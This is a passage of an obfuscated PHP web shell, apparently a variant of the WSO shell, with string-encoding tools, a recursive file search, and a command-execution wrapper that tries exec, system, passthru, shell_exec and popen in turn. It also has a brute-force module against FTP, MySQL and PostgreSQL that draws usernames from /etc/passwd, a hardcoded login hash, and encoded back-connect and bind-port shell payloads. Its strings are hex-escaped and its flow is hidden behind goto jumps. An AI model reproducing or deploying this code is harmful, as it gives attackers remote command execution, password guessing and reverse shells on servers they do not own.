(!function_exists("\142\151\156\150\x65\170")) { function binhex($p) { return dechex(bindec($p)); } } if (!function_exists("\150\x65\x78\62\x61\163\x63\x69\151")) { function hex2ascii($p) { $r = ''; for ($i = 0; $i < strLen($p); $i += 2) { $r .= chr(hexdec($p[$i] . $p[$i + 1])); } return $r; } } if (!function_exists("\x61\163\x63\151\151\62\x68\145\170")) { function ascii2hex($p) { $r = ''; for ($i = 0; $i < strlen($p); ++$i) { $r .= sprintf("\45\60\x32\x58", ord($p[$i])); } return strtoupper($r); } } if (!function_exists("\146\x75\x6c\154\x5f\x75\x72\154\x65\156\x63\157\144\145")) { function full_urlencode($p) { $r = ''; for ($i = 0; $i < strlen($p); ++$i) { $r .= "\45" . dechex(ord($p[$i])); } return strtoupper($r); } } $stringTools = array("\102\x61\163\145\x36\x34\x20\145\x6e\x63\157\x64\x65" => "\142\x61\x73\x65\66\64\137\x65\x6e\143\157\144\x65", "\x42\x61\x73\x65\66\64\40\144\x65\x63\x6f\x64\x65" => "\142\141\163\x65\x36\64\x5f\x64\145\x63\x6f\x64\x65", "\x55\162\x6c\40\145\x6e\143\157\x64\x65" => "\165\162\x6c\x65\x6e\143\x6f\144\145", "\125\x72\154\40\144\x65\x63\x6f\x64\145" => "\x75\162\154\144\x65\143\157\x64\145", "\x46\x75\154\x6c\40\x75\162\x6c\x65\156\x63\x6f\144\x65" => "\146\165\x6c\x6c\x5f\x75\162\x6c\145\156\x63\157\144\145", "\x6d\x64\x35\x20\150\141\x73\x68" => "\155\x64\x35", "\x73\150\x61\x31\40\150\x61\x73\150" => "\x73\150\141\61", "\143\x72\x79\x70\x74" => "\x63\x72\171\x70\164", "\103\x52\103\63\x32" => "\x63\x72\x63\x33\x32", "\x41\123\x43\111\x49\x20\x74\157\40\x48\105\x58" => "\141\x73\143\x69\x69\x32\x68\x65\170", "\110\x45\130\40\x74\157\40\101\x53\x43\111\x49" => "\150\145\x78\62\x61\x73\143\151\x69", "\110\105\x58\40\164\157\40\104\x45\x43" => "\x68\x65\x78\x64\x65\143", "\110\x45\x58\40\x74\x6f\x20\x42\111\116" => "\x68\x65\x78\x32\x62\x69\156", "\104\x45\x43\40\x74\157\40\110\x45\x58" => "\144\x65\143\150\145\x78", "\x44\105\103\x20\x74\x6f\40\102\111\x4e" => "\x64\145\143\142\x69\x6e", "\102\x49\x4e\x20\x74\157\x20\110\105\130" => "\142\151\156\x68\145\170", "\102\111\116\x20\x74\x6f\x20\x44\105\103" => "\142\x69\156\144\x65\143", "\123\x74\x72\151\x6e\147\40\164\x6f\x20\x6c\x6f\167\x65\x72\x20\143\x61\163\145" => "\x73\x74\x72\164\157\154\157\x77\x65\x72", "\x53\x74\x72\151\x6e\147\x20\x74\157\x20\165\x70\160\145\162\x20\x63\141\163\145" => "\163\x74\x72\164\157\165\x70\x70\x65\x72", "\110\x74\155\x6c\x73\160\145\x63\151\x61\x6c\x63\150\141\x72\163" => "\150\x74\155\154\x73\x70\145\143\151\141\154\143\150\141\162\x73", "\123\164\162\x69\x6e\147\x20\154\145\156\x67\x74\x68" => "\x73\x74\x72\x6c\x65\156"); if (isset($_POST["\x61\152\x61\170"])) { BEER_setcookie(md5($_SERVER["\110\x54\x54\120\x5f\x48\117\x53\124"]) . "\141\152\x61\x78", true); ob_start(); if (in_array($_POST["\166\141\164"], $stringTools)) { echo $_POST["\166\x61\164"]($_POST["\167\x61\164"]); } $temp = "\x64\157\143\165\x6d\x65\156\x74\x2e\x67\x65\x74\105\154\x65\x6d\145\156\x74\102\x79\x49\144\x28\47\163\164\162\117\x75\164\160\165\164\x27\51\x2e\163\x74\171\154\x65\x2e\144\151\163\160\154\141\171\x3d\x27\x27\73\x64\x6f\143\165\x6d\x65\x6e\x74\x2e\147\145\164\105\x6c\145\x6d\145\156\164\x42\x79\x49\x64\50\x27\x73\164\x72\117\165\164\160\165\164\x27\x29\x2e\x69\156\156\x65\162\110\124\x4d\x4c\75\x27" . addcslashes(htmlspecialchars(ob_get_clean()), "\12\xa\11\x5c\x27\x20") . "\47\73\12"; echo strlen($temp), "\xa", $temp; die; } if (empty($_POST["\141\152\141\x78"]) && !empty($_POST["\x76\x61\x74"])) { BEER_setcookie(md5($_SERVER["\x48\124\x54\x50\x5f\110\117\x53\x54"]) . "\x61\152\x61\x78", 0); } beer_Header(); echo "\x3c\x68\x31\x3e\123\164\x72\x69\x6e\147\40\143\157\156\166\145\162\x73\151\157\156\163\74\x2f\150\61\x3e\x3c\x64\151\166\x20\143\x6c\x61\163\163\x3d\x63\157\x6e\x74\x65\x6e\x74\76"; echo "\x3c\146\157\162\x6d\x20\x6e\x61\155\x65\x3d\47\164\x6f\157\x6c\163\x46\x6f\x72\155\x27\x20\x6f\x6e\x53\165\x62\155\x69\x74\75\47\x69\x66\x28\x74\150\x69\163\56\141\x6a\x61\x78\56\143\150\145\x63\x6b\x65\144\x29\x7b\141\x28\x6e\x75\154\x6c\x2c\156\x75\x6c\x6c\54\164\150\151\x73\56\163\145\154\x65\x63\x74\124\x6f\157\154\56\166\x61\154\x75\145\54\164\150\x69\163\x2e\x69\156\x70\165\164\56\166\141\154\165\145\x29\73\x7d\x65\154\x73\145\x7b\147\x28\x6e\165\154\154\x2c\x6e\165\x6c\x6c\x2c\x74\x68\151\163\x2e\x73\145\x6c\145\143\x74\x54\157\x6f\x6c\x2e\166\x61\154\165\x65\54\x74\x68\x69\163\x2e\x69\x6e\160\x75\x74\56\x76\x61\x6c\x75\x65\51\x3b\175\x20\x72\145\164\x75\x72\x6e\40\x66\141\x6c\x73\145\x3b\47\x3e\74\x73\145\154\x65\143\x74\40\156\141\x6d\x65\x3d\x27\163\145\154\145\x63\x74\124\157\x6f\154\x27\x3e"; foreach ($stringTools as $k => $v) { echo "\74\x6f\160\164\x69\157\x6e\40\166\141\154\165\145\75\47" . htmlspecialchars($v) . "\x27\76" . $k . "\x3c\x2f\157\x70\164\151\157\156\76"; } echo "\x3c\x2f\163\x65\154\145\143\x74\76\74\151\156\x70\165\x74\40\x74\x79\160\x65\x3d\47\163\165\x62\155\151\164\47\40\166\141\154\165\x65\75\47\76\76\x27\57\x3e\40\74\151\156\x70\165\164\x20\164\x79\160\x65\x3d\143\x68\x65\x63\153\142\157\170\x20\x6e\141\155\145\75\141\152\x61\170\x20\x76\x61\x6c\165\x65\75\61\x20" . (@$_COOKIE[md5($_SERVER["\x48\124\x54\x50\x5f\x48\x4f\x53\x54"]) . "\141\x6a\x61\x78"] ? "\143\x68\145\143\x6b\x65\144" : '') . "\x3e\40\x73\145\156\x64\40\x75\163\151\156\147\40\101\112\x41\130\74\142\x72\76\x3c\164\x65\x78\x74\141\162\x65\x61\40\156\141\x6d\x65\x3d\x27\151\156\160\x75\164\x27\40\x73\x74\x79\154\145\75\x27\155\x61\x72\147\151\156\x2d\164\x6f\160\x3a\x35\x70\x78\x27\x20\x63\x6c\x61\163\163\75\142\151\147\x61\x72\145\141\76" . (empty($_POST["\x76\141\164"]) ? '' : htmlspecialchars(@$_POST["\167\141\164"])) . "\74\x2f\x74\x65\170\x74\x61\162\145\141\76\x3c\57\x66\x6f\x72\155\76\74\160\162\145\40\x63\154\141\163\163\x3d\x27\x6d\x6c\61\x27\x20\x73\164\x79\x6c\x65\x3d\47" . (empty($_POST["\x76\141\x74"]) ? "\x64\151\163\x70\154\141\x79\x3a\x6e\157\156\x65\73" : '') . "\x6d\x61\162\147\x69\156\55\x74\157\160\72\x35\x70\x78\x27\40\151\144\x3d\x27\163\164\x72\117\x75\164\160\x75\x74\x27\76"; if (!empty($_POST["\166\141\164"])) { if (in_array($_POST["\166\x61\x74"], $stringTools)) { echo htmlspecialchars($_POST["\166\141\x74"]($_POST["\167\141\x74"])); } } echo "\x3c\x2f\160\162\x65\76\74\57\x64\151\x76\76\74\x62\162\x3e\74\150\x31\76\123\145\x61\x72\143\x68\x20\x66\151\154\145\163\x3a\x3c\57\x68\61\76\x3c\x64\x69\x76\x20\143\x6c\x61\x73\163\75\143\157\x6e\x74\x65\156\164\x3e\12\x9\x9\x3c\146\x6f\162\x6d\x20\157\x6e\x73\x75\142\155\151\164\75\x22\147\x28\x6e\165\x6c\x6c\54\x74\x68\151\163\x2e\143\167\x64\x2e\x76\x61\x6c\165\x65\x2c\156\165\x6c\x6c\54\164\x68\x69\163\x2e\164\x65\170\x74\56\x76\x61\x6c\165\x65\x2c\164\x68\x69\x73\x2e\x66\x69\154\145\x6e\x61\x6d\145\56\166\x61\x6c\x75\x65\x29\73\x72\x65\164\165\162\156\x20\146\141\154\x73\145\x3b\42\76\x3c\164\x61\x62\x6c\145\40\143\145\154\x6c\x70\141\144\x64\151\156\x67\75\47\x31\47\40\x63\x65\x6c\x6c\163\160\141\x63\151\156\147\75\47\x30\47\x20\167\x69\144\164\x68\x3d\47\65\60\45\x27\76\xa\11\x9\11\x3c\x74\x72\x3e\74\x74\144\40\167\151\144\164\150\75\x27\x31\45\47\x3e\124\x65\x78\x74\x3a\74\x2f\x74\144\x3e\74\x74\x64\76\74\151\156\x70\x75\x74\40\164\171\160\x65\x3d\47\164\x65\x78\x74\x27\40\x6e\141\x6d\145\x3d\x27\x74\x65\170\164\x27\x20\x73\x74\171\x6c\x65\75\x27\x77\x69\144\x74\150\x3a\x31\60\60\45\47\x3e\x3c\57\x74\x64\x3e\74\x2f\164\162\x3e\xa\x9\11\11\x3c\x74\162\76\74\x74\x64\x3e\120\x61\x74\150\72\74\x2f\x74\144\76\74\x74\x64\x3e\x3c\151\x6e\x70\x75\164\40\x74\171\x70\x65\x3d\47\164\145\170\164\x27\40\156\141\155\x65\75\47\x63\167\x64\47\40\x76\141\154\165\x65\75\47" . htmlspecialchars($GLOBALS["\x63\167\144"]) . "\47\40\163\x74\x79\154\x65\x3d\47\x77\x69\x64\x74\150\x3a\x31\x30\60\x25\47\x3e\74\x2f\164\x64\x3e\x3c\57\164\162\x3e\12\11\11\x9\x3c\164\162\x3e\74\164\x64\76\116\x61\155\x65\72\x3c\x2f\x74\144\76\x3c\x74\x64\76\74\x69\x6e\160\165\x74\x20\x74\x79\160\145\75\x27\164\x65\170\164\x27\40\156\x61\x6d\145\x3d\x27\x66\x69\154\x65\156\141\155\x65\47\x20\166\141\x6c\165\145\75\47\52\x27\x20\x73\x74\x79\x6c\x65\75\x27\x77\151\144\164\150\x3a\x31\x30\x30\45\47\76\x3c\57\164\144\76\x3c\57\164\x72\76\xa\11\x9\11\74\x74\x72\76\x3c\x74\x64\x3e\x3c\x2f\x74\144\x3e\x3c\x74\144\76\x3c\x69\x6e\160\x75\x74\40\x74\x79\160\145\x3d\47\x73\165\x62\x6d\151\x74\47\40\166\x61\x6c\x75\x65\x3d\47\76\76\x27\x3e\x3c\57\x74\x64\76\x3c\57\164\162\76\12\11\x9\x9\x3c\57\164\x61\142\x6c\145\76\x3c\57\146\157\x72\x6d\76"; function beer_RecursiveGlob($path) { if (substr($path, -1) != "\57") { $path .= "\x2f"; } $paths = @array_unique(@array_merge(@glob($path . $_POST["\170\141\x74"]), @glob($path . "\x2a", GLOB_ONLYDIR))); if (is_array($paths) && @count($paths)) { foreach ($paths as $item) { if (@is_dir($item)) { if ($path != $item) { beer_RecursiveGlob($item); } } else { if (empty($_POST["\x77\x61\x74"]) || @strpos(file_get_contents($item), $_POST["\167\141\x74"]) !== false) { echo "\74\x61\40\150\x72\145\146\x3d\47\x23\x27\40\157\x6e\143\x6c\151\x63\x6b\75\47\x67\50\x22\106\x69\154\145\x73\x54\x6f\x6f\x6c\x73\x22\54\156\165\154\154\54\42" . urlencode($item) . "\x22\x2c\40\42\x76\x69\x65\x77\x22\x2c\x22\42\51\47\76" . htmlspecialchars($item) . "\x3c\x2f\141\76\x3c\142\162\x3e"; } } } } } if (@$_POST["\170\141\164"]) { beer_RecursiveGlob($_POST["\143\141\x74"]); } echo "\x3c\57\x64\151\x76\x3e\x3c\x62\162\x3e"; beer_Footer(); } goto pZbar; XyCKj: @ini_set("\145\162\162\157\x72\137\x6c\x6f\147", NULL); goto LMh48; ji6I0: function actionBruteforce() { beer_Header(); if (isset($_POST["\x70\162\157\164\157"])) { echo "\x3c\150\61\76\122\145\163\165\154\x74\163\x3c\57\150\61\76\x3c\144\x69\166\40\x63\154\141\163\163\75\x63\157\156\164\145\156\x74\76\x3c\163\x70\141\x6e\x3e\x54\x79\160\x65\72\74\x2f\x73\x70\x61\156\76\40" . htmlspecialchars($_POST["\160\162\x6f\164\x6f"]) . "\x20\74\x73\160\141\x6e\x3e\123\x65\x72\x76\145\x72\x3a\74\x2f\163\160\x61\x6e\x3e\40" . htmlspecialchars($_POST["\x73\145\162\x76\x65\x72"]) . "\x3c\x62\162\x3e"; if ($_POST["\x70\162\x6f\164\157"] == "\x66\x74\160") { function beer_BruteForce($ip, $port, $login, $pass) { $fp = @ftp_connect($ip, $port ? $port : 21); if (!$fp) { return false; } $res = @ftp_login($fp, $login, $pass); @ftp_close($fp); return $res; } } elseif ($_POST["\160\162\157\164\x6f"] == "\155\x79\163\161\154") { function beer_BruteForce($ip, $port, $login, $pass) { $res = @mysql_connect($ip . "\72" . ($port ? $port : 3306), $login, $pass); @mysql_close($res); return $res; } } elseif ($_POST["\160\x72\157\x74\x6f"] == "\x70\x67\163\161\154") { function beer_BruteForce($ip, $port, $login, $pass) { $str = "\x68\x6f\163\x74\75\47" . $ip . "\x27\x20\x70\157\x72\164\75\x27" . $port . "\x27\x20\x75\163\145\162\x3d\47" . $login . "\x27\40\x70\141\163\163\x77\x6f\162\144\x3d\x27" . $pass . "\x27\40\x64\142\156\141\x6d\x65\x3d\x70\x6f\163\164\x67\162\x65\163"; $res = @pg_connect($str); @pg_close($res); return $res; } } $success = 0; $attempts = 0; $server = explode("\x3a", $_POST["\163\145\162\x76\145\162"]); if ($_POST["\x74\171\x70\145"] == 1) { $temp = @file("\x2f\x65\x74\x63\x2f\160\141\x73\x73\x77\144"); if (is_array($temp)) { foreach ($temp as $line) { $line = explode("\72", $line); ++$attempts; if (beer_BruteForce(@$server[0], @$server[1], $line[0], $line[0])) { $success++; echo "\x3c\142\x3e" . htmlspecialchars($line[0]) . "\x3c\x2f\x62\x3e\72" . htmlspecialchars($line[0]) . "\74\x62\162\x3e"; } if (@$_POST["\x72\145\166\x65\x72\x73\145"]) { $tmp = ''; for ($i = strlen($line[0]) - 1; $i >= 0; --$i) { $tmp .= $line[0][$i]; } ++$attempts; if (beer_BruteForce(@$server[0], @$server[1], $line[0], $tmp)) { $success++; echo "\74\142\76" . htmlspecialchars($line[0]) . "\74\57\142\76\x3a" . htmlspecialchars($tmp); } } } } } elseif ($_POST["\x74\x79\160\145"] == 2) { $temp = @file($_POST["\x64\151\143\x74"]); if (is_array($temp)) { foreach ($temp as $line) { $line = trim($line); ++$attempts; if (beer_BruteForce($server[0], @$server[1], $_POST["\154\x6f\147\151\x6e"], $line)) { $success++; echo "\x3c\142\x3e" . htmlspecialchars($_POST["\x6c\157\x67\x69\156"]) . "\74\57\x62\76\x3a" . htmlspecialchars($line) . "\x3c\142\x72\x3e"; } } } } echo "\74\x73\x70\x61\x6e\76\101\x74\x74\x65\x6d\160\x74\x73\72\x3c\x2f\x73\x70\141\156\76\40{$attempts}\x20\x3c\163\x70\141\x6e\x3e\123\165\x63\x63\x65\163\163\x3a\x3c\x2f\163\160\141\x6e\76\x20{$success}\x3c\57\x64\151\x76\x3e\74\x62\162\x3e"; } echo "\74\x68\x31\x3e\x42\162\165\164\x65\146\x6f\162\143\145\74\x2f\150\61\76\x3c\144\x69\166\x20\143\x6c\x61\163\x73\x3d\x63\157\x6e\x74\x65\x6e\164\x3e\x3c\x74\x61\x62\x6c\x65\x3e\74\146\157\x72\155\x20\x6d\x65\164\x68\x6f\x64\x3d\160\157\163\164\76\x3c\x74\x72\x3e\x3c\x74\x64\x3e\x3c\163\160\141\156\x3e\x54\171\160\x65\74\57\163\160\141\x6e\76\74\x2f\x74\144\x3e" . "\x3c\164\144\x3e\74\163\145\154\145\x63\x74\40\x6e\x61\x6d\145\x3d\160\x72\x6f\x74\157\x3e\74\157\x70\x74\151\x6f\x6e\x20\x76\141\x6c\x75\x65\x3d\x66\164\160\x3e\106\124\x50\x3c\x2f\x6f\x70\164\151\x6f\156\76\x3c\x6f\x70\164\x69\x6f\156\40\166\141\154\165\145\75\x6d\171\163\161\x6c\76\115\x79\x53\x71\154\x3c\57\157\x70\164\151\157\156\76\x3c\x6f\160\x74\151\157\156\40\166\141\154\x75\145\75\160\x67\x73\x71\x6c\76\120\157\163\164\x67\162\x65\x53\161\x6c\x3c\x2f\x6f\160\x74\151\x6f\156\76\x3c\57\x73\145\x6c\145\143\164\76\74\x2f\x74\144\76\74\x2f\x74\162\x3e\74\x74\x72\76\74\x74\144\76" . "\74\151\x6e\x70\165\x74\40\164\171\x70\x65\75\x68\x69\144\x64\x65\x6e\40\x6e\x61\155\145\x3d\143\x20\166\141\154\165\145\75\42" . htmlspecialchars($GLOBALS["\x63\x77\x64"]) . "\42\x3e" . "\74\151\x6e\x70\165\x74\40\164\x79\160\x65\75\x68\x69\144\144\145\x6e\x20\x6e\x61\155\x65\75\x61\x20\166\141\x6c\165\145\75\42" . htmlspecialchars($_POST["\x61\143\x74"]) . "\x22\76" . "\x3c\151\x6e\160\x75\164\x20\164\x79\x70\145\x3d\150\x69\x64\x64\x65\x6e\x20\156\141\155\145\x3d\143\x73\145\164\40\x76\x61\154\165\145\75\x22" . htmlspecialchars($_POST["\x63\x73\145\x74"]) . "\42\76" . "\74\163\160\x61\156\76\x53\x65\162\166\x65\162\x3a\160\x6f\x72\x74\74\57\163\160\x61\x6e\76\74\x2f\x74\144\x3e" . "\74\x74\144\x3e\74\x69\156\x70\165\x74\x20\164\x79\x70\145\75\164\145\170\164\x20\x6e\141\x6d\x65\75\163\x65\x72\x76\145\162\x20\x76\x61\154\165\145\x3d\x22\61\62\x37\56\x30\x2e\x30\56\x31\x22\76\x3c\57\x74\144\76\74\57\164\x72\x3e" . "\74\x74\x72\76\x3c\x74\x64\x3e\x3c\x73\x70\x61\156\76\102\162\165\164\145\40\164\x79\160\x65\74\x2f\163\x70\141\156\x3e\x3c\57\164\144\76" . "\x3c\x74\144\76\74\x6c\x61\142\x65\154\76\x3c\x69\x6e\x70\x75\164\x20\164\171\160\145\x3d\162\141\144\151\x6f\40\156\x61\x6d\x65\x3d\164\x79\160\145\40\166\141\154\165\x65\75\42\61\42\40\x63\x68\x65\x63\x6b\145\x64\76\x20\57\x65\x74\143\57\x70\141\163\x73\167\144\74\x2f\154\141\142\145\154\x3e\74\x2f\164\144\x3e\x3c\x2f\164\x72\76" . "\x3c\x74\162\76\x3c\164\x64\x3e\74\57\164\144\x3e\74\x74\144\76\x3c\154\141\x62\x65\154\40\x73\x74\171\154\145\x3d\x22\160\x61\x64\144\151\156\x67\x2d\154\145\146\x74\x3a\61\x35\160\x78\42\x3e\74\151\156\160\165\164\40\164\171\x70\x65\75\x63\x68\145\143\x6b\x62\157\170\40\x6e\x61\x6d\x65\75\162\145\x76\145\162\163\x65\x20\166\141\x6c\x75\145\75\61\x20\x63\x68\145\x63\153\x65\144\76\40\x72\x65\x76\145\x72\163\145\x20\x28\154\x6f\x67\151\156\40\x2d\x3e\40\x6e\x69\x67\157\x6c\51\x3c\57\x6c\x61\142\145\x6c\x3e\x3c\x2f\x74\x64\76\x3c\x2f\164\162\x3e" . "\x3c\164\162\76\74\x74\144\76\x3c\57\x74\144\x3e\74\164\144\76\x3c\x6c\x61\142\145\x6c\x3e\74\151\156\x70\165\164\x20\x74\171\160\x65\x3d\x72\x61\x64\x69\x6f\x20\x6e\x61\155\145\x3d\164\x79\160\145\x20\166\141\x6c\x75\145\x3d\x22\62\42\76\40\x44\x69\x63\x74\x69\157\156\141\162\171\74\x2f\x6c\x61\142\145\x6c\x3e\74\x2f\164\144\x3e\74\57\164\162\x3e" . "\74\164\x72\x3e\74\164\x64\76\x3c\x2f\164\x64\x3e\x3c\x74\144\x3e\x3c\x74\x61\142\154\x65\x20\x73\x74\171\154\x65\75\x22\160\x61\x64\144\151\156\147\x2d\x6c\145\x66\x74\x3a\61\x35\160\x78\42\x3e\74\x74\x72\x3e\74\x74\144\x3e\74\163\x70\x61\156\76\x4c\157\x67\151\x6e\74\57\x73\x70\141\156\x3e\74\x2f\x74\x64\x3e" . "\74\x74\x64\x3e\74\151\x6e\160\x75\x74\40\x74\171\x70\145\x3d\164\145\170\164\40\x6e\141\155\145\75\x6c\x6f\147\x69\156\40\166\141\154\165\x65\x3d\x22\162\x6f\157\x74\x22\76\x3c\57\x74\144\76\x3c\x2f\x74\x72\x3e" . "\74\164\162\76\74\164\144\76\x3c\x73\x70\141\156\x3e\104\x69\x63\164\151\x6f\156\141\x72\171\74\x2f\x73\x70\141\x6e\76\x3c\x2f\164\144\76" . "\74\164\x64\76\x3c\x69\x6e\160\x75\x74\x20\x74\171\x70\145\x3d\x74\x65\170\x74\40\x6e\141\x6d\145\75\x64\x69\x63\164\x20\x76\x61\154\165\145\x3d\x22" . htmlspecialchars($GLOBALS["\x63\167\144"]) . "\x70\141\163\163\167\144\x2e\x64\x69\143\42\76\74\57\x74\144\x3e\x3c\x2f\164\162\x3e\74\x2f\164\x61\142\x6c\x65\76" . "\x3c\57\x74\144\x3e\74\57\x74\x72\76\74\164\162\76\74\164\x64\76\74\57\164\144\x3e\74\x74\144\76\x3c\x69\x6e\160\165\x74\40\164\171\x70\145\x3d\163\165\142\x6d\151\164\40\166\141\x6c\x75\x65\x3d\x22\76\x3e\x22\76\x3c\57\x74\144\x3e\74\x2f\x74\162\x3e\x3c\x2f\x66\157\162\x6d\x3e\74\57\x74\x61\x62\x6c\x65\76"; echo "\74\57\x64\151\x76\76\x3c\142\162\x3e"; beer_Footer(); } goto beSCq; bt0zZ: $disable_functions = @ini_get("\144\x69\x73\x61\142\154\145\137\x66\x75\156\x63\164\151\157\x6e\x73"); goto zJLfh; CijWD: function beer_Ex($input) { $output = ''; if (function_exists("\x65\170\145\143")) { @exec($input, $output); $output = @join("\xa", $output); } elseif (function_exists("\160\141\x73\x73\164\150\x72\165")) { ob_start(); @passthru($input); $output = ob_get_clean(); } elseif (function_exists("\x73\x79\x73\164\145\155")) { ob_start(); @system($input); $output = ob_get_clean(); } elseif (function_exists("\x73\x68\x65\154\154\137\x65\170\145\143")) { $output = shell_exec($input); } elseif (is_resource($f = @popen($input, "\x72"))) { $output = ''; while (!@feof($f)) { $output .= fread($f, 1024); } pclose($f); } return $output; } goto igmz6; x5wc6: if (isset($_COOKIE["\x61\143\x74"])) { $_COOKIE["\141\143\164"] = base64_decode($_COOKIE["\x61\x63\164"]); } goto Nyn9W; CGLQ_: @ini_set("\x6d\141\170\137\x65\x78\145\x63\x75\x74\x69\157\x6e\x5f\x74\x69\155\145", 0); goto OepEn; ijDC4: $auth_pass = "\x61\x35\x62\64\x61\143\141\x37\x36\x36\66\64\141\64\x35\65\64\x33\60\61\x37\x63\67\141\70\x63\65\x36\65\71\x30\142"; goto savMC; gGYGb: function actionNetwork() { beer_Header(); $back_connect_p = "\123\x58\x6c\106\144\x6d\122\x59\124\x6e\x6c\115\115\153\160\167\x59\x6d\x6b\x35\x64\61\x70\x59\x53\x6e\x4e\105\125\130\101\170\x59\172\112\x56\132\x31\x55\171\117\x57\160\x68\x4d\x6c\x59\167\124\63\x63\167\123\x30\x70\x48\142\107\150\x61\122\61\112\x35\125\106\x64\x73\x64\126\x70\x59\125\155\132\x5a\x57\x46\x4a\x32\x59\155\x6c\x6e\x61\x31\106\127\123\153\x68\127\142\x48\116\x33\127\x46\x4e\162\132\62\x5a\x49\144\x32\144\141\122\x32\170\x73\x53\x30\x4e\113\x52\155\x4e\x75\123\x6e\x5a\x6a\141\155\x39\x6e\x53\x6b\116\107\x59\62\x4a\x70\x53\x58\102\x50\144\172\102\x4c\123\153\150\x43\141\x46\x70\110\125\156\x6c\x51\127\105\65\x32\127\124\112\x30\x61\106\x70\110\x55\x6e\154\131\115\155\x78\x31\x53\x30\116\x53\121\154\x56\162\132\106\x64\x58\145\153\x5a\x6b\124\105\116\x42\x61\62\x46\x58\122\x6d\164\141\123\x45\154\167\x53\125\x68\64\x4f\105\x6c\110\x55\x6e\x42\x61\125\62\144\160\x55\x6c\x68\x4b\145\127\111\x7a\123\124\x5a\112\x51\x31\x46\157\x57\105\143\x30\141\125\164\125\143\x30\65\104\x61\x56\112\x33\x59\62\60\65\x4d\x47\112\66\x4d\127\x35\141\x57\106\112\63\131\62\60\x35\115\x47\x49\171\x53\x6a\126\x69\x62\x55\132\60\x57\154\x4e\156\x62\x6d\x52\110\124\x6e\x64\113\145\x57\x73\63\x52\x46\x46\x77\x65\155\111\x79\124\x6e\x4a\x61\127\106\106\x76\126\124\x41\x35\x52\x46\115\167\126\154\x56\x4d\121\60\x4a\122\x55\155\x77\x35\123\154\x52\x72\126\154\126\115\121\60\x4a\125\x56\x44\x42\x4f\124\x46\x67\x78\124\154\x56\126\x61\x31\x5a\x43\x56\106\x4e\x33\x5a\x30\160\111\x51\156\x6c\151\x4d\x31\112\62\123\61\116\x43\117\107\132\104\x51\155\164\x68\x56\x31\x56\x76\123\x57\164\127\x65\127\x4e\x74\117\130\154\120\141\125\x46\x72\x53\x56\x5a\64\144\125\154\x70\141\x7a\144\x45\125\130\x42\161\131\x6a\x49\x31\144\x56\160\x58\124\152\102\x4c\122\x6b\x35\x51\125\124\x42\60\122\x6c\132\104\x64\62\144\x4b\x53\x45\x4a\x6f\127\x6b\144\x53\145\x55\x74\124\121\152\150\x6d\x51\x30\x4a\162\x59\126\x64\126\x62\x30\154\x72\x56\x6e\154\x6a\142\124\x6c\65\x54\x32\x6c\102\141\x30\154\127\145\x48\126\x4a\x61\x57\163\63\x52\106\106\x77\144\155\x4e\110\x56\156\x56\x4c\x52\x6b\65\126\x55\x6b\126\x73\124\60\170\104\121\127\154\x51\x61\126\x70\x55\x56\x44\x42\x4f\x54\106\112\127\125\x57\154\114\x56\110\116\117\x51\x32\60\x35\144\x31\x70\130\x4e\107\x39\126\x4d\126\112\x46\126\x44\106\127\126\125\170\x44\x51\127\154\x51\141\x56\x70\x55\126\x44\102\x4f\124\106\112\127\x55\x57\154\x4c\x56\110\x4e\x4f\x51\62\60\x35\x64\x31\x70\130\116\x47\71\x56\x4d\x56\112\x46\x55\x6c\132\x4b\125\60\170\104\121\127\x6c\x51\141\126\160\125\x56\104\102\117\124\106\x4a\127\x55\127\x6c\114\x56\x48\116\117\x51\62\x35\x4f\x4e\127\115\172\x55\155\x78\151\125\62\x64\x75\x54\x44\x4a\x4b\x63\x47\x4a\x70\x4f\130\160\x68\121\60\106\60\131\126\x4e\x6a\x63\105\x39\x33\115\105\x74\x5a\x4d\156\150\62\131\172\112\x56\142\61\x55\x78\x55\x6b\x56\x54\126\x54\122\x77\124\63\x63\x77\123\x31\x6b\x79\x65\110\132\x6a\115\154\126\166\126\124\x46\123\122\126\x51\x78\x56\154\126\x4c\x56\110\116\x4f\x51\62\x31\117\143\62\111\172\x54\155\170\x4c\122\x6b\x35\126\x55\x6b\x56\x57\125\61\x56\x70\141\x7a\x63"; $bind_port_p = "\x53\x58\154\x46\x64\155\122\x59\x54\156\154\x4d\x4d\x6b\160\167\131\x6d\153\x35\144\61\160\x59\123\156\x4e\x45\125\x57\71\x72\x56\124\102\157\x52\154\x52\106\144\172\x6c\x4a\141\124\x6c\160\131\x56\x63\x30\x64\x6d\x4d\171\x5a\x32\x64\x4d\x56\x32\164\x70\124\63\143\x77\123\62\106\x58\x57\127\144\114\122\125\x4a\x43\126\127\164\153\x56\60\154\x45\144\x32\144\x4e\125\62\x74\156\x5a\x58\x6c\103\142\x47\x56\x48\x62\104\102\114\x52\105\x56\167\x54\x33\154\x43\x4f\x55\x52\122\x63\104\x46\152\115\154\x56\x6e\126\x54\x49\x35\x61\x6d\105\x79\x56\152\x42\120\144\172\x42\x4c\x59\172\111\65\x61\155\105\x79\126\152\x42\114\122\x6b\x31\172\123\x6d\170\x43\122\61\x67\x77\x62\105\71\123\126\x6c\106\x7a\x53\x6d\170\x4f\125\106\105\167\144\107\x5a\126\115\126\112\124\125\154\126\107\124\153\170\x48\132\x47\170\x6b\123\x45\x4a\x35\131\152\x4e\123\x64\154\x6c\x75\x62\110\126\132\126\172\106\x73\x53\60\x4e\153\115\x46\153\x7a\121\x57\x35\x4c\x55\62\x74\x6e\x5a\x6b\150\x33\132\61\160\110\142\107\170\x4a\x51\x30\160\x45\x57\x56\x63\61\x4d\x45\x6c\110\x54\156\x6c\141\126\60\131\167\127\x6c\x4e\103\145\x6d\111\171\124\x6e\112\141\x57\106\112\152\x59\155\154\x4a\116\x30\122\x52\143\x48\x70\141\x57\106\112\66\x59\152\x4a\x4f\143\155\x49\172\121\x6a\x42\x4c\122\153\61\x7a\x56\124\101\65\x54\126\x67\x78\x54\x6c\102\122\x4d\110\122\x47\x56\153\x4e\64\126\x46\121\170\117\x56\116\x53\126\154\132\125\x55\154\x56\x47\x52\x56\112\x47\123\130\x4e\116\x55\x32\x73\x33\122\x46\x46\x77\x61\127\106\x58\116\x57\164\114\122\x6b\x31\x7a\131\172\111\65\141\x6d\105\171\x52\155\164\x61\x53\105\160\155\x59\126\x63\x30\142\60\x70\106\x52\154\116\x53\115\x56\x70\151\x54\x55\x59\167\x63\61\116\x56\116\125\112\123\122\126\112\x54\x57\x44\102\x47\x54\x31\144\x54\141\63\102\112\x53\110\x67\x34\123\125\x64\123\143\106\x70\x54\121\x57\154\x52\115\153\132\x31\132\x45\x4e\x43\x64\x6d\116\x48\126\x6e\126\x4a\123\x45\112\x32\x59\x32\65\x53\131\x32\112\160\123\124\144\105\125\